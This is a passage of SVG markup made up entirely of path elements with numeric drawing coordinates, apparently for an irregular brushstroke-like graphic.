d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n        <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n        <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n        <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n        <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n        <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n        <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n        <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n        <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n        <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n        <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n        <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n        <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n        <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n        <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n        <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n        <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n        <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n        <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n        <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n        <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n        <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n        <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n        <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n        <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n        <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n        <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n        <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n        <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n        <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n        <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n        <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n        <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n        <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n        <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n        <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n        <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n        <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n        <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n        <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n        <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n        <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n        <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n        <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n        <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n        <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n        <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n        <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n        <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n        <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n        <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n        <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n        <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n        <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n        <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n        <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n        <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n        <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n        <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n        <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n        <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n        <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n        <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n        <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n        <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n        <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n        <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n        <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n        <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n        <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n        <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n        <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n        <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n        <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n        <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n        <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n        <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n        <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n        <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n        <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n        <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n        <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n        <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n        <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n        <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n        <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n        <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n        <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n        <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n        <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n        <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n        <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n        <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n        <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n        <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n        <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n        <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n        <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n        <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n        <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n        <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n        <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n        <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n        <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n        <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n        <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n   